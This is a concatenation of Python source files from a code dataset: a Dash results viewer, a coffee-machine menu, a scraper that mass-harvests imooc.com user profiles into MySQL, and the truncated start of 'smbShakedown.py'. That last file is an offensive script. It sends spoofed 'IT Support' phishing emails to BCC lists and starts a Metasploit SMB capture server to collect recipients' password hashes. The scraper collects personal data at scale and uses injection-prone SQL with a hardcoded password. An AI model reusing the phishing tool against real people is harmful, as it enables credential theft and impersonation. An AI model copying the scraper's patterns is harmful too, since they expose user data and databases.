5:\n # filtre['result'] = {'$lt': range_res}\n l_retour = []\n\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n\n df = get_results(db.runs, filter_by=filtre, project={'start_time': True,\n \"status\": True,\n \"host.hostname\": True,\n \"experiment.name\": True\n }, include_index=True, prune=False)\n for row in df.iterrows():\n l_retour.append({'label': \"{}_{}\".format(row[1][\"_id\"],\n #row[1][\"result\"],\n row[1][\"experiment.name\"]),\n 'value': row[1][\"_id\"]})\n\n\n return sorted(l_retour, key=lambda k: k['label'].split('_')[1])\n\n\n\n@app.callback(Output('slider_img', 'max'),\n [\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value'),\n Input('expe_list_image', 'value'),\n Input('train_or_test', 'value')\n ])\ndef update_image_slider(expe_name, value, completed, range_res, id, train_or_test):\n if id is None:\n return\n\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n #if range_res < 5:\n # filtre['result'] = {'$lt': range_res}\n length = 0\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n df = get_results(db.runs, filter_by=filtre, project={'start_time': True,\n \"status\": True,\n \"host.hostname\": True,\n \"experiment.name\": True,\n \"info.exp_dir\": True,\n }, include_index=True,\n prune=False)#.sort_values('result')\n\n folder = df[df['_id'] == id]['info.exp_dir'].values[0]\n if folder is None:\n return 0\n if train_or_test == 'test':\n length = len(glob(folder + \"/test*\"))\n if length == 0:\n folder = folder.replace('big', 'gogos')\n length = len(glob(folder + \"/test*\"))\n\n elif train_or_test == 'train':\n length = len(glob(folder + \"/train*\"))\n if length == 0:\n folder = folder.replace('big', 'gogos')\n length = len(glob(folder + \"/train*\"))\n\n else:\n length = 0\n\n return length\n\n\n@app.callback(Output('image_exp', 'src'),\n [\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value'),\n Input('expe_list_image', 'value'),\n Input('slider_img', 'value'),\n Input('train_or_test', 'value')\n ])\ndef update_image(expe_name, value, completed, range_res, id, slider_num, train_or_test):\n\n if id is None:\n return\n\n db = client[value]\n\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n #if range_res < 5:\n # filtre['result'] = {'$lt': range_res}\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n df = get_results(db.runs, filter_by=filtre, project={'start_time': True,\n \"status\": True,\n \"host.hostname\": True,\n \"experiment.name\": True,\n \"info.exp_dir\": True,\n },\n include_index=True,\n prune=False)#.sort_values('result')\n\n folder = df[df['_id'] == id]['info.exp_dir'].values[0]\n if folder is None:\n return []\n if train_or_test == 'test':\n length = len(glob(folder + \"/test*\"))\n list_img = glob(folder+\"/test*\")\n if length == 0:\n folder = folder.replace('big', 'gogos')\n length = len(glob(folder + \"/test*\"))\n list_img = glob(folder+\"/test*\")\n\n\n elif train_or_test == 'train':\n length = len(glob(folder + \"/train*\"))\n list_img = glob(folder+\"/train*\")\n if length == 0:\n folder = folder.replace('big', 'gogos')\n length = len(glob(folder + \"/train*\"))\n list_img = glob(folder+\"/train*\")\n else:\n list_img = []\n\n if len(list_img) > 0:\n list_img = sorted_nicely(list_img)\n encoded_image = base64.b64encode(open(list_img[slider_num], 'rb').read()).decode('utf-8').replace('\\n', '')\n return 'data:image/png;base64,{}'.format(encoded_image)\n else:\n return ''\n else:\n return ''\n else:\n return ''\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, port=8052)\n", "sub_path": "app_ambient_gan_unconditional.py", "file_name": "app_ambient_gan_unconditional.py", "file_ext": "py", "file_size_in_byte": 23646, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "dash.Dash", "line_number": 13, "usage_type": "call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 102, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 195, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 196, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 209, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 210, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 220, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 221, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 226, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 227, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 228, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 229, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 230, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 295, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 297, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 298, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 299, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 300, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 327, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 329, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 330, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 331, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 332, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 333, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 334, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 369, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 370, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 371, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 372, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 373, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 402, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 404, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 405, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 406, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 407, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 408, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 431, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 433, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 434, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 435, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 436, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 437, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 472, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 473, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 474, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 475, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 476, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 477, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 509, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 510, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 515, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 517, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 518, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 519, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 520, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 583, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 586, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 589, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 592, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 550, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 552, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 553, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 554, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 555, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 556, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 557, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 636, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 637, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 640, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 641, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 645, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 646, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 649, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 650, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 656, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 600, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 602, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 603, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 604, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 605, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 606, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 607, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 608, "usage_type": "call"}]}
+{"seq_id": "597844299", "text": "import os\n\n#from lib.coffee.types_of_coffee import Americano, Latte, Cappuccino, Espresso\nfrom lib.coffee.types_of_coffee import TypesOfCoffee\nfrom lib.machine.coffee_machine import CoffeMachine\n\n\nclass Menu(object):\n def __init__(self):\n self.machine = CoffeMachine()\n\n def wait_action(self):\n return input(\"Press [Enter] to continue...\")\n\n def make_coffee(self):\n print(\"Choose your coffee:\")\n drinks = [TypesOfCoffee().Latte.name,\n TypesOfCoffee().Espresso.name,\n TypesOfCoffee().Cappuccino.name,\n TypesOfCoffee().Americano.name, \"Exit\"]\n for i, option in enumerate(drinks):\n print(\"[{}] {}\".format(str(i + 1), drinks[i]))\n\n choice = int(input(\"Enter your choice [1-5]: \" )) - 1\n if choice in range(0, 4):\n self.machine.brewingCoffe(int(choice))\n self.wait_action()\n elif choice == 4:\n print(\"Exit from Make Coffee\")\n return\n else:\n print(\"There is no such a drink!\")\n self.wait_action()\n\n\n def fill_coffeeMachine(self):\n self.machine.fill()\n self.wait_action()\n\n def filter_coffeeMachine(self):\n self.machine.add_filter()\n self.wait_action()\n\n def turn_on_coffeeMachine(self):\n self.machine.turn_on()\n self.wait_action()\n\n def turn_off_coffeeMachine(self):\n self.machine.turn_off()\n self.wait_action()\n\n def remove_grounds_from_coffeMachine(self):\n self.machine.removeGrounds()\n self.wait_action()\n\n def show_status(self):\n print(\"Current state of Coffee Machine:\")\n print(\"Water: {}\".format(self.machine.water_supply.level))\n print(\"Milk: {}\".format(self.machine.milk_supply.level))\n print(\"Beans: {}\".format(self.machine.supply_of_coffee_beans.level))\n print(\"Ground: {}\".format(self.machine.ground.level))\n print(\"Is Filter: {}\".format(self.machine.filter))\n print(\"Turn on: {}\".format(self.machine.power_button))\n self.wait_action()\n\n def main_menu(self):\n self.options = [\"Show the state of the Coffee Machine\",\"Make Coffee\",\n \"Fill the machine\", \"Add filter\", \"Turn on Coffee Machine\",\n \"Turn off Coffee Machine\", \"Remove grounds\", \"Exit\"]\n\n for i, option in enumerate(self.options):\n print(\"[{}] {}\".format(str(i+1),self.options[i]))\n", "sub_path": "lib/menu/main_menu.py", "file_name": "main_menu.py", "file_ext": "py", "file_size_in_byte": 2447, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "lib.machine.coffee_machine.CoffeMachine", "line_number": 10, "usage_type": "call"}, {"api_name": "lib.coffee.types_of_coffee.TypesOfCoffee", "line_number": 17, "usage_type": "call"}, {"api_name": "lib.coffee.types_of_coffee.TypesOfCoffee", "line_number": 18, "usage_type": "call"}, {"api_name": "lib.coffee.types_of_coffee.TypesOfCoffee", "line_number": 19, "usage_type": "call"}, {"api_name": "lib.coffee.types_of_coffee.TypesOfCoffee", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "42185256", "text": "#!/usr/bin/env python\n\n# -*- encoding: utf-8 -*-\n\n\"\"\"\n@Author : Amelia \n@Contact : yu_mengling@hust.edu.cn\n@File : test_userdetail.py\n \n@Time : 18-7-17 下午9:50\n\"\"\"\n\n''' 慕课网用户页'''\n# import threading\n\nimport time\nfrom typing import Dict, Any, Union\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pymysql\n\n\n# 慕课网 python\n# https://www.imooc.com/u/1857206/courses 第一个用户? 到6946586\n# url中有两个变量: user_id, page_num\n\nFIRST_USER = 1857210 # 1857206\nLAST_USER = 6946586 # 6900000\nuser_id = 1857206 # the first user #2481691\n\nbase_url = 'https://www.imooc.com/u/'\npage_url = '/courses?page=' # + page_num # 可能有多个page\n# url = 'https://ke.qq.com/course/list/python'\n\nheaders = {'user-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'}\n\n# urls = []\n# def generate_urls(FIRST_USER, LAST_USER):\n# rLock = threading.RLock()\n\n\nfor user_id in range(FIRST_USER, LAST_USER):\n user_url = base_url + str(user_id) + '/courses'\n res = requests.get(user_url, headers=headers)\n if res.status_code != 200:\n print('user %s not exist' % user_id)\n break\n\n html_doc = res.text\n # print(html_doc)\n soup = BeautifulSoup(html_doc, 'html.parser')\n # course_list = soup.find_all(\"div\",class_=\"course-list-cont\")\n # # print course_list\n # for course in course_list:\n # print course\n\n user_detail = soup.find('div', class_='user-info clearfix')\n user_info = {}\n user_info['sex'] = '无'\n user_info['province'] = '无'\n user_info['city'] = '无'\n user_info['city'] = '无'\n user_info['career'] = '无'\n\n user_info['user_id'] = user_id\n user_info['user_pic_url'] = user_detail.find('img')['src']\n user_info['user_name'] = user_detail.find('h3', class_='user-name clearfix').span.get_text()\n\n about = user_detail.find('p', class_='about-info').contents\n\n about_name_list = ['sex', 'province', 'city', 'career']\n for i, sp in enumerate([x for x in about[:-2] if x != '\\n']):\n user_info[about_name_list[i]] = sp.get_text().strip()\n\n user_info['user_sign'] = user_detail.find('p', class_='user-desc').get_text()\n\n study_info = user_detail.find_all('div', class_='item follows')\n study_info_name_list = ['total_study_duration', 'exp', 'coins', 'follows', 'fans']\n for i, st in enumerate(study_info):\n st_text = st.get_text().strip().split('\\n')\n user_info[study_info_name_list[i]] = st_text[0]\n try:\n page_info = soup.find('div', class_='page').contents\n page_num = int(page_info[-1]['href'].split('=')[-1])\n except:\n page_num = 1\n\n # for k in user_info.keys():\n # print('%s:%s' % (k, user_info[k]))\n\n # --------------------------------------------------------------------------------------------------\n # 将用户基本数据写入数据库\n\n sql_user = 'INSERT INTO user_basic_info (' \\\n 'user_id,user_name, sex, user_pic_url, user_sign, province, city, career, total_study_duration,'\\\n 'exp, coins, follows, fans) ' \\\n 'VALUES (%d, \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', %d, %d, %d, %d);' % \\\n (int(user_info['user_id']), user_info['user_name'], user_info['sex'], user_info['user_pic_url'],\n user_info['user_sign'], user_info['province'],user_info['city'], user_info['career'],\n user_info['total_study_duration'],\n int(user_info['exp']), int(user_info['coins']), int(user_info['follows']), int(user_info['fans']))\n print(sql_user)\n\n # 打开数据库连接\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"IMOOC_COURSE\", use_unicode=True, charset=\"utf8\")\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # 使用 execute() 方法执行 SQL 语句\n # 一页内的数据,按条插入数据库\n\n # cursor.execute(sql)\n try:\n # 执行sql语句\n cursor.execute(sql_user)\n # 提交到数据库执行\n db.commit()\n print(\"[ok] user info: commit to database\")\n except:\n # 如果发生错误则回滚\n db.rollback()\n\n # 关闭数据库连接\n db.close()\n\n # time.sleep(2)\n\n # -------------------------------------------------------------------------------------------------\n # ???\n # https: // www.imooc.com / u / 1857211 / courses?page = 1\n # Traceback(most recent call last): File\n # \"/home/amelia/program-basic/Online-Education-Analysis/imooc_spider/test_userdetail.py\", line 150, in < module >\n # study_time = course.find('span').get_text().strip()\n # AttributeError: 'NoneType' object has no attribute 'find'\n for page_id in range(1, page_num+1):\n url = base_url + str(user_id) + page_url + str(page_id)\n print(url)\n res = requests.get(url, headers=headers)\n if res.status_code != 200:\n print('user %s not exist' % user_id)\n continue\n html_doc = res.text\n # print(html_doc)\n soup = BeautifulSoup(html_doc, 'html.parser')\n first_course = soup.find(\"div\", class_=\"clearfix tl-item tl-item-first\")\n course_list = soup.find_all(\"div\", class_=\"clearfix tl-item \")\n\n course_list.insert(0, first_course)\n\n page_pro = []\n\n if course_list is None:\n continue\n for course in course_list:\n # print(course)\n study_time = course.find('span').get_text().strip()\n year, date = study_time.split('\\n')\n\n cour = course.find_all('div', class_=\"course-list-cont\")\n for cha in cour:\n pro = {}\n pro['user_id'] = user_id\n pro['recent_study_date'] = year + u'年' + date\n h3 = cha.find('h3', class_='study-hd').find('a')\n pro['course_name'] = h3.get_text()\n pro['course_url'] = h3['href']\n\n # h3 = cha.find('h3', class_='study-hd').find('a')\n # pro['course_name'] = h3.get_text()\n # pro['course_id'] = h3['href']\n\n study_points = cha.find('div', class_='study-points').contents\n pro['has_learn'] = study_points[1].get_text()[2:]\n pro['time_consuming'] = study_points[3].get_text()\n pro['study_to'] = study_points[5].get_text()\n\n catog_points = cha.find('div', class_='catog-points').contents\n pro['note_num'] = catog_points[1].get_text()[3:]\n pro['code_num'] = catog_points[3].get_text()[3:]\n pro['ques_num'] = catog_points[5].get_text()[3:]\n\n # for k in pro.keys():\n # print('%s:%s' % (k, pro[k]))\n # print('\\n')\n page_pro.append(pro)\n\n # print(page_pro)\n # 打开数据库连接\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"IMOOC_COURSE\", use_unicode=True, charset=\"utf8\")\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # 使用 execute() 方法执行 SQL 语句\n # 一页内的数据,按条插入数据库\n\n for p in page_pro:\n sql = 'INSERT INTO user_learn_detail (' \\\n 'user_id, course_url, course_name, recent_study_date, has_learn, time_consuming, study_to,' \\\n 'note_num, code_num, ques_num) ' \\\n 'VALUES (%d, \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\',' \\\n ' %d, %d, %d);' % \\\n (int(p['user_id']), p['course_url'], p['course_name'], p['recent_study_date'],\n p['has_learn'], p['time_consuming'], p['study_to'],\n int(p['note_num']), int(p['code_num']), int(p['ques_num']))\n print(sql)\n\n try:\n # 执行sql语句\n cursor.execute(sql)\n # 提交到数据库执行\n db.commit()\n print(\"ok! commit to database\")\n\n except:\n # 如果发生错误则回滚\n db.rollback()\n\n # 关闭数据库连接\n db.close()\n\n time.sleep(3)\n\n\n# if __name__ == '__main__':\n# pass\n", "sub_path": "imooc_spider/test_userdetail.py", "file_name": "test_userdetail.py", "file_ext": "py", "file_size_in_byte": 8262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 52, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 106, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 138, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 144, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 189, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 220, "usage_type": "call"}]}
+{"seq_id": "468455150", "text": "#!/usr/bin/env python\n# Description: A simplified SMB Email Client Attack script.\n# Created by: Nick Sanzotta / @beamr\n# Version: smbShakedown.py v 1.10252016.b\nimport os, sys, smtplib, getpass, readline, socket, time, subprocess\nimport urllib, json\nimport readline\nreadline.parse_and_bind(\"tab: complete\")\nimport SocketServer, SimpleHTTPServer, multiprocessing\n\nrcfile = 'smbServ.rc'\n\nclass colors:\n\twhite = \"\\033[1;37m\"\n\tnormal = \"\\033[0;00m\"\n\tred = \"\\033[1;31m\"\n\tblue = \"\\033[1;34m\"\n\tgreen = \"\\033[1;32m\"\n\tx = \"\\033[1;35m\"\n\nbanner = colors.x + r\"\"\"\n __ \n /\\ \\ \n ____ ___ ___\\ \\ \\____ \n /',__\\ /' __` __`\\ \\ '__`\\ \n/\\__, `\\/\\ \\/\\ \\/\\ \\ \\ \\L\\ \\\n\\/\\____/\\ \\_\\ \\_\\ \\_\\ \\_,__/\n \\/___/ \\/_/\\/_/\\/_/\\/___/ \n\n ____ __ __ __ \n/\\ _`\\ /\\ \\ /\\ \\ /\\ \\ \n\\ \\,\\L\\_\\ \\ \\___ __ \\ \\ \\/'\\ __ \\_\\ \\ ___ __ __ __ ___ \n \\/_\\__ \\\\ \\ _ `\\ /'__`\\ \\ \\ , < /'__`\\ /'_` \\ / __`\\/\\ \\/\\ \\/\\ \\ /' _ `\\ \n /\\ \\L\\ \\ \\ \\ \\ \\/\\ \\L\\.\\_\\ \\ \\\\`\\ /\\ __//\\ \\L\\ \\/\\ \\L\\ \\ \\ \\_/ \\_/ \\/\\ \\/\\ \\ \n \\ `\\____\\ \\_\\ \\_\\ \\__/.\\_\\\\ \\_\\ \\_\\ \\____\\ \\___,_\\ \\____/\\ \\___x___/'\\ \\_\\ \\_\\\n \\/_____/\\/_/\\/_/\\/__/\\/_/ \\/_/\\/_/\\/____/\\/__,_ /\\/___/ \\/__//__/ \\/_/\\/_/\n\n\"\"\"+'\\n' \\\n+ colors.x + '\\n smbShakedown.py v1.10252016.b' \\\n+ colors.normal + '\\n Description: A simplified SMB Email Client Attack script.'\\\n+ colors.normal + '\\n Created by: Nick Sanzotta/@beamr' + '\\n'\\\n+ colors.normal + ' ' + '*' * 95 +'\\n' + colors.normal\n\ndef cls():\n\tos.system('cls' if os.name == 'nt' else 'clear')\n\ndef get_external_address():\n\tdata = json.loads(urllib.urlopen(\"http://ip.jsontest.com/\").read())\n\tprint(\"External IP: \"+data[\"ip\"])\n\treturn data[\"ip\"]\n\ndef get_internal_address():\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ts.connect((\"8.8.8.8\", 80))\n\tprint(\"Internal IP: \"+s.getsockname()[0])\n\treturn s.getsockname()[0]\n\ndef yes_no(answer):\n\tyes = set(['yes','y', 'ye', ''])\n\tno = set(['no','n'])\n\t \n\twhile True:\n\t\tchoice = raw_input(answer).lower()\n\t\tif choice in yes:\n\t\t return True\n\t\telif choice in no:\n\t\t return False\n\t\telse:\n\t\t\tprint ('Please respond with \\'yes\\' or \\'no\\'\\n')\n\ndef smbServ():\n\t'''starts a metasploit smb capture server in a tmux session called msf_shakedown'''\n\tsmb_server_option = self.yes_no('Use a local Metasploit SMB capture server in a screen session called msf_shakedown? (y/n): ')\n\t#FEATURE need to allow a choice of internal or external ip?\n\tif smb_server_option is True:\n\t\trc_config = \\\n\t\t'use auxiliary/server/capture/smb\\n'+\\\n\t\t'set srvhost {}\\n'.format(self.internal_ip)+\\\n\t\t'set JOHNPWFILE /opt/smbShakedown/smb_hashes\\n'+\\\n\t\t'exploit -j -z'\n\t\tprint('\\n{}\\n').format(str(rc_config))\n\t\t#prompt user to ok the rc file config\n\t\tvalidate_rc_file = self.yes_no('rc file ready to execute? (y/n): ')\n\t\t#if they ok the file\n\t\tif validate_rc_file is True:\n\t\t\t#write the file\n\t\t\twith open(self.rc_file, 'w') as rc_file:\n\t\t\t\trc_file.writelines(str(rc_config))\n\t\t\t\trc_file.close()\n\t\t\t#use subprocess to open tmux new session and run msfconsole in it \n\t\t\ttry:\n\t\t\t\tprint('Starting tmux...')\n\t\t\t\tproc = subprocess.Popen(['tmux', 'new-session', '-d', '-s', 'msf_shakedown',\\\n\t\t\t\t 'msfconsole -q -r {}'.format(self.rc_file)], stdout=subprocess.PIPE)\n\t\t\t\t(out, err) = proc.communicate()\n\t\t\t\tprint('Screen sessions: {}'.format(out))\n\t\t\texcept Exception as e:\n\t\t\t\tprint('Error: {}'.format(e))\n\t\t\t\tsys.exit(1)\n\t\t#if user opts to not run msfconsole smb capture locallly, provide a sample rc file\n\t\telse:\n\t\t\tprint('You\\'ll need to provide your own rc file. Here\\'s a sample')\n\t\t\tprint('use auxiliary/server/capture/smb\\n\\\nset srvhost \\n\\\nset JOHNPWFILE /opt/smbShakedown/smb_hashes\\n\\\nexploit -j -z')\n\n\n\n\ndef smtpConn(smtpServerAddress, smtpServerPort, smtpUser, smtpPassword, senderAddress, recipientAddress, emailMessage):\n\tsmtpserver = smtplib.SMTP(smtpServerAddress, smtpServerPort)\n\tsmtpserver.ehlo()\n\tsmtpserver.starttls()\n\tsmtpserver.ehlo\n\tsmtpserver.login(smtpUser, smtpPassword)\n\tprint(\"Testing Connection to your SMTP Server...\")\n\ttime.sleep(1)\n\ttry:\n\t\tstatus = smtpserver.noop()[0]\n\t\tprint(\"SMTP Server Status: \",status)\n\t\t\n\t\tsendOption = yes_no('Connection to SMTP Server is successful, would you like to send mail now? (y/n): ')\n\n\t\tif sendOption is True:\n\t\t\tsmtpserver.sendmail(senderAddress, recipientAddress, emailMessage)\n\t\t\tprint(\"Message(s) sent!\")\n\t\t\tsmtpserver.quit()\n\t\t\treturn True\n\t\telse:\n\t\t\tsmtpserver.quit()\n\t\t\tprint(\"Ok no mail sent.\")\n\t\t\treturn False\n\n\n\t\t'''sendOption = raw_input(\"Connection to SMTP Server is successful, would you like to send mail now?[yes]:\") or 'yes'\n\t\t\n\n\t\tchoice = sendOption.lower()\n\t\tyes = set(['yes','y', 'ye', ''])\n\t\tno = set(['no','n'])\n\t\tprint('ENTERED: \"%s\"' % choice + \"\\n\")\n\t\tif choice in yes:\n\t\t\tsmtpserver.sendmail(senderAddress, recipientAddress, emailMessage)\n\t\t\tprint(\"Message(s) sent!\")\n\t\t\tsmtpserver.quit()\n\t\t\treturn True\n\t\telif choice in no:\n\t\t\tsmtpserver.quit()\n\t\t\tprint(\"Ok no mail sent.\")\n\t\t\treturn False\n\t\telse:\n\t\t\tsys.stdout.write(\"Please respond with 'yes' or 'no'\")'''\n\n\n\texcept:\n\t\tstatus = -1\n\t\tprint(\"[Aborting]SMTP Server Status: \",status)\n\treturn True if status == 250 else False\n\ndef main():\n\tcls()\n\tprint(banner)\n\ttry:\n\t\textipAddress = get_external_address()\n\texcept IOError:\n\t\tprint(\"Check your Internet connection\")\n\t\tsys.exit(0)\n\tipAddress = get_internal_address()\n\t#duplicate\n\t#ipAddress = get_internal_address()\n\tprint(\"\\n\")\n\tsmtpServerAddress = raw_input('Enter SMTP Server address[smtp.gmail.com]: ') or 'smtp.gmail.com'\n\tprint('ENTERED: \"%s\"' % smtpServerAddress + \"\\n\")\n\tsmtpServerPort = raw_input('Enter your SMTP Server Port[587]: ') or 587\n\tprint('ENTERED: \"%s\"' % smtpServerPort + \"\\n\")\n\tsmtpUser = raw_input('Enter SMTP Server username[****@gmail.com]: ')\n\tprint('ENTERED: *****\\n')\n\tsmtpPassword = getpass.getpass(r'Enter SMTP Server password: ')\n\tprint(\"\\n\")\n\tsenderName = raw_input('Enter \"from name\":[IT Support]') or 'IT Support'\n\tprint('ENTERED:' \"%s\" % senderName + \"\\n\")\n\tsenderAddress = raw_input('Enter \"from address\":[itsupport@company.com]') or 'itsupport@company.com'\n\tprint('ENTERED:' \"%s\" % senderAddress + \"\\n\")\n\trecipientName = raw_input('Enter recipient(s) name[Company Staff]: ') or 'Company Staff'\n\tprint('ENTERED:' \"%s\" % recipientName + \"\\n\")\n\tprint('TIP: This will help avoid the orange \"?\" and/or Spoof the recipient. Default value usually works.')\n\trcptHeader = raw_input('Enter recipient address for the email header[staff@company.com]') or 'staff@company.com'\n\tprint('ENTERED:' \"%s\" % rcptHeader + \"\\n\")\n\ttry:\n\t\tprint('TIP: For multiple addresses, enter a file or seperate with a comma\\n'\\\n\t\t'EX:/opt/emailAddresses.txt or user1@company.com,user2@company.com')\n\t\trawrcptAddress = raw_input('Enter BCC recipient addresses[File or individual email(s)]): ')\n\t\tprint('ENTERED:' \"%s\" % rawrcptAddress + \"\\n\")\n\t\twith open(rawrcptAddress, 'r') as f1:\n\t\t\tx = f1.read()\n\t\trecipientAddress = x.split()\n\t\tprint(recipientAddress)\n\t\tprint(\"\\n\")\n\texcept IOError:\n\t\trecipientAddress=rawrcptAddress.split(',')\n\t\tprint('ENTERED:' \"%s\" % recipientAddress + \"\\n\")\n\tsmbCaptureServer = raw_input('Enter SMB Capture Server IP address['+extipAddress+']: ') or extipAddress\n\tprint('ENTERED:' \"%s\" % smbCaptureServer + \"\\n\")\n\t#HYPER LINK OPTIONS\n\tprint('TIP: A HyperLink can be directed to an Webpage with an HTML IMG Tag.')\n\n\t#use yes_no function instead of inline\n\t#hyperLinkOption = raw_input('Would you like to add a HyperLink to your message?[yes]: ') or 'yes'\n\thyperLinkOption = yes_no('Would you like to add a HyperLink to your message? (y/n): ')\n\n\t'''print('ENTERED:' \"%s\" % hyperLinkOption + \"\\n\")\n\tchoice = hyperLinkOption.lower()\n\tyes = set(['yes','y', 'ye', ''])\n\tno = set(['no','n'])\n\tif choice in 